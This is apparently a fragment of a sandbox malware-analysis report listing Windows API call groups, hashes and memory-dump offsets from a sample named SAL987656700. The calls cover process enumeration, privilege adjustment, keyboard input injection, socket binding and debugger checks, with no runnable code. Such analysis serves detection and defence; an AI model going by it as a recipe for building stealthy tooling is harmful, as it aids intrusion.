                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                      • String ID: *.*
                                      • API String ID: 1972594611-438819550
                                      • Opcode ID: d268aa5ec2d577b983aa636d69bd296c7e62c79177cd16f6ba8d3273a205de67
                                      • Instruction ID: 71301c7fba0154c18ed4506a49b01fd663ee3d4d439df8a5cf46d74a932c92e2
                                      • Opcode Fuzzy Hash: d268aa5ec2d577b983aa636d69bd296c7e62c79177cd16f6ba8d3273a205de67
                                      • Instruction Fuzzy Hash: D5414B7194420EABDF14EF68C885BEEBBB8FF05310F244056E955E2191EB309E84CF61
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00899A4E
                                      • GetSysColor.USER32(0000000F), ref: 00899B23
                                      • SetBkColor.GDI32(?,00000000), ref: 00899B36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 1958858920-0
                                      • Opcode ID: 77bf090d52f2a88d2b74549b6cdb92ae5697bd6c0a865e2dbf42afcdb391c103
                                      • Instruction ID: 912af0bee888ea9bfc7087720217f05730e65921aa7fbdea5999536e7b990c89
                                      • Opcode Fuzzy Hash: 77bf090d52f2a88d2b74549b6cdb92ae5697bd6c0a865e2dbf42afcdb391c103
                                      • Instruction Fuzzy Hash: 8DA10970208528BFEF24BA2D9C59FBB27DDFB86314B18420EF542C6AD1DA259D41D372
                                      APIs
                                        • Part of subcall function 0090304E: inet_addr.WS2_32(?), ref: 0090307A
                                        • Part of subcall function 0090304E: _wcslen.LIBCMT ref: 0090309B
                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0090185D
                                      • WSAGetLastError.WS2_32 ref: 00901884
                                      • bind.WS2_32(00000000,?,00000010), ref: 009018DB
                                      • WSAGetLastError.WS2_32 ref: 009018E6
                                      • closesocket.WS2_32(00000000), ref: 00901915
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 1601658205-0
                                      • Opcode ID: c2f87da8ac7e595172ce80a5dfc1b4fae38a3e976c41068c5379b62c9f70c805
                                      • Instruction ID: d8b92d188c5fcab8f6a1ede6a50366ee316ca57c777a24db298f052a9bf7eef2
                                      • Opcode Fuzzy Hash: c2f87da8ac7e595172ce80a5dfc1b4fae38a3e976c41068c5379b62c9f70c805
                                      • Instruction Fuzzy Hash: E0518375A002109FEB10AF28D886F6A77E5EB44718F18C498FA159F3D3D771AD41CBA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: d5a755681baaa400f3e0dcb83320825c8664e2897f89870b3e29e3e4ad50815d
                                      • Instruction ID: 7969e120423c8f270ecedb3b43bc1abc04180ad4294f23c285eec03b6ccc1559
                                      • Opcode Fuzzy Hash: d5a755681baaa400f3e0dcb83320825c8664e2897f89870b3e29e3e4ad50815d
                                      • Instruction Fuzzy Hash: E821B7717842156FE7209F1AD844B9A7BE9FF85354F198058E986CB391CB71EC82CBD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: 2bc87d473b384b6abaf04faa34addcb2b503edfa11d93c17595da0e5d0023291
                                      • Instruction ID: fa58c12b16581bb4d026fc6366f07e4b0d3f2e15b41dabfdbb2d70ad76fe743b
                                      • Opcode Fuzzy Hash: 2bc87d473b384b6abaf04faa34addcb2b503edfa11d93c17595da0e5d0023291
                                      • Instruction Fuzzy Hash: DAA27C71A0061ACBDF24DF58C944BAEB7B1FF54314F6481AAE815E7285EB30ED91CB90
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0090A6AC
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0090A6BA
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0090A79C
                                      • CloseHandle.KERNEL32(00000000), ref: 0090A7AB
                                        • Part of subcall function 0089CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,008C3303,?), ref: 0089CE8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                      • String ID:
                                      • API String ID: 1991900642-0
                                      • Opcode ID: b0a794f1feaf6d45e46c22db4e08718cd87d43734649e30ff08bc31c374b56cb
                                      • Instruction ID: 35fc65af19946de1e1c5003d599c30733794390bcc1af6bdecc32f1461264927
                                      • Opcode Fuzzy Hash: b0a794f1feaf6d45e46c22db4e08718cd87d43734649e30ff08bc31c374b56cb
                                      • Instruction Fuzzy Hash: EF514C71508311AFD714EF28D886A6BBBE8FF89754F04892DF585D7291EB30E904CB92
                                      APIs
                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 008EAAAC
                                      • SetKeyboardState.USER32(00000080), ref: 008EAAC8
                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 008EAB36
                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 008EAB88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: ccff7d4544369880c4629a971e4946018ddd729397de361d74689278f5e95a31
                                      • Instruction ID: 278406e7893e7e0d91e283e4a86d1471c7c7f712af5f332d0c5403e8f6d665d2
                                      • Opcode Fuzzy Hash: ccff7d4544369880c4629a971e4946018ddd729397de361d74689278f5e95a31
                                      • Instruction Fuzzy Hash: A4312C70A40388AEFB388A66CC05BFA77A6FB96B30F04421AF181D61D0D375A985D753
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • GetCursorPos.USER32(?), ref: 00919001
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008D7711,?,?,?,?,?), ref: 00919016
                                      • GetCursorPos.USER32(?), ref: 0091905E
                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,008D7711,?,?,?), ref: 00919094
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                      • String ID:
                                      • API String ID: 1423138444-0
                                      • Opcode ID: 33b2e9ed1d395e9b19ef2985605db1244b5f62eed15f828ffac6aa55bbba4905
                                      • Instruction ID: 1ffc8d716bb34fc51218f9e83dfac630a9e595242a05d6609db5edf234f0e223
                                      • Opcode Fuzzy Hash: 33b2e9ed1d395e9b19ef2985605db1244b5f62eed15f828ffac6aa55bbba4905
                                      • Instruction Fuzzy Hash: 83219F35711118EFCB25CF99CC68EEA7BB9EB49361F044069F90587261C3359D90EB60
                                      APIs
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 008FCE89
                                      • GetLastError.KERNEL32(?,00000000), ref: 008FCEEA
                                      • SetEvent.KERNEL32(?,?,00000000), ref: 008FCEFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorEventFileInternetLastRead
                                      • String ID:
                                      • API String ID: 234945975-0
                                      • Opcode ID: 298b1b18e8023262e11eac556cad869c290aa99a7d2505d844be39fceebcd854
                                      • Instruction ID: ba11365ed9d3c53c68cdf53d6e4bbc2747b2961116ba1bc2189d1ce2c9574e19
                                      • Opcode Fuzzy Hash: 298b1b18e8023262e11eac556cad869c290aa99a7d2505d844be39fceebcd854
                                      • Instruction Fuzzy Hash: C621ACB164430D9BEB20CF65CA48BA6B7F8FB50318F10881AE646D2151EB70EA04DB60
                                      APIs
                                      • lstrlenW.KERNEL32(?,008C5222), ref: 008EDBCE
                                      • GetFileAttributesW.KERNEL32(?), ref: 008EDBDD
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008EDBEE
                                      • FindClose.KERNEL32(00000000), ref: 008EDBFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                      • String ID:
                                      • API String ID: 2695905019-0
                                      • Opcode ID: 5bfa242c1e36fa97c58a67d227672a03bf7df5d7cbff8534b0954c3a5da79bf4
                                      • Instruction ID: fe7ac88ffb42ac122eddb7dba32326c2316d53c2390438353bbeca957e99ca59
                                      • Opcode Fuzzy Hash: 5bfa242c1e36fa97c58a67d227672a03bf7df5d7cbff8534b0954c3a5da79bf4
                                      • Instruction Fuzzy Hash: 4CF0EC704686145782206B7C9C0D4EA376CEF03374B208702F435C11F0EBB09D58D5D6
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008E82AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ($|
                                      • API String ID: 1659193697-1631851259
                                      • Opcode ID: 3023c92987a408520a7e0fda77d8f7d9cbd18a5ac6594bb4a1fb33bad970b69a
                                      • Instruction ID: ff34cb07ca729c7ef2a905007d7c445628a756ae743506629372027b4af71f9e
                                      • Opcode Fuzzy Hash: 3023c92987a408520a7e0fda77d8f7d9cbd18a5ac6594bb4a1fb33bad970b69a
                                      • Instruction Fuzzy Hash: 75322474A04745DFCB28CF5AC481A6AB7F0FF48710B15856EE99ADB3A1EB70E941CB40
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008F5CC1
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008F5D17
                                      • FindClose.KERNEL32(?), ref: 008F5D5F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: face222440950de0d9f638767c924c5b670f2680f449deae365cf3bd472b0d1b
                                      • Instruction ID: a4fedb577c48fddcadf37f47f3e45fb057adfca176d94e848d49b1119f56b7c6
                                      • Opcode Fuzzy Hash: face222440950de0d9f638767c924c5b670f2680f449deae365cf3bd472b0d1b
                                      • Instruction Fuzzy Hash: EF51CC746046059FD704EF28C484EA6B7E4FF4A318F14856DEA6ACB3A1DB30ED00CB92
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 008B271A
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008B2724
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 008B2731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: d4a862007036ba0a6f159767e2b595190ecca0a23a08d90a7318301cc69d1a8f
                                      • Instruction ID: 44231a2bfe11b946816d2e278db934ac370e391a6a93a1d8ce479c88b9745374
                                      • Opcode Fuzzy Hash: d4a862007036ba0a6f159767e2b595190ecca0a23a08d90a7318301cc69d1a8f
                                      • Instruction Fuzzy Hash: 1D31C4749512289BCB21DF68DC88BD8B7B8FF08310F5041EAE41CA6260EB309F818F45
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F51DA
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008F5238
                                      • SetErrorMode.KERNEL32(00000000), ref: 008F52A1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 26fe9dec3da6080415252fbb093276335c6720d27b68d94538ff6cc12cb54824
                                      • Instruction ID: f5343837c285f699ff6ec1a555f1ede48c0f5298cf37dba3c1f2e411929d7365
                                      • Opcode Fuzzy Hash: 26fe9dec3da6080415252fbb093276335c6720d27b68d94538ff6cc12cb54824
                                      • Instruction Fuzzy Hash: 92318F75A00508DFDB00DF64D884EADBBB4FF09318F088099E905EB362DB31E845CBA1
                                      APIs
                                        • Part of subcall function 0089FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008A0668
                                        • Part of subcall function 0089FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 008A0685
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E170D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E173A
                                      • GetLastError.KERNEL32 ref: 008E174A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                      • String ID:
                                      • API String ID: 577356006-0
                                      • Opcode ID: 510994c888b5af8437e56d72c3689100d1dd8fb41a55cc5390a2760e1db5921b
                                      • Instruction ID: e40223511f25e5f40bbddb82035b874657175aef7549b4d9ab886e11d48fe063
                                      • Opcode Fuzzy Hash: 510994c888b5af8437e56d72c3689100d1dd8fb41a55cc5390a2760e1db5921b
                                      • Instruction Fuzzy Hash: A811C1B2514308AFDB18AF54DC8ADAAB7F9FB05714B24C52EE05697641EB70BC41CA20
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008ED608
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 008ED645
                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008ED650
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: e920505067e59bfd99778733b450b23b9b1ee960329189829c8975a2b532defb
                                      • Instruction ID: 490af4e8c68456b9033636d2d52b0bfb96cf90a4281d781622f44f9ee649c1f9
                                      • Opcode Fuzzy Hash: e920505067e59bfd99778733b450b23b9b1ee960329189829c8975a2b532defb
                                      • Instruction Fuzzy Hash: 25117CB1E45228BBDB108F959C44FEFBBBCEB45B50F108111F924E7290C2704A058BE1
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008E168C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E16A1
                                      • FreeSid.ADVAPI32(?), ref: 008E16B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
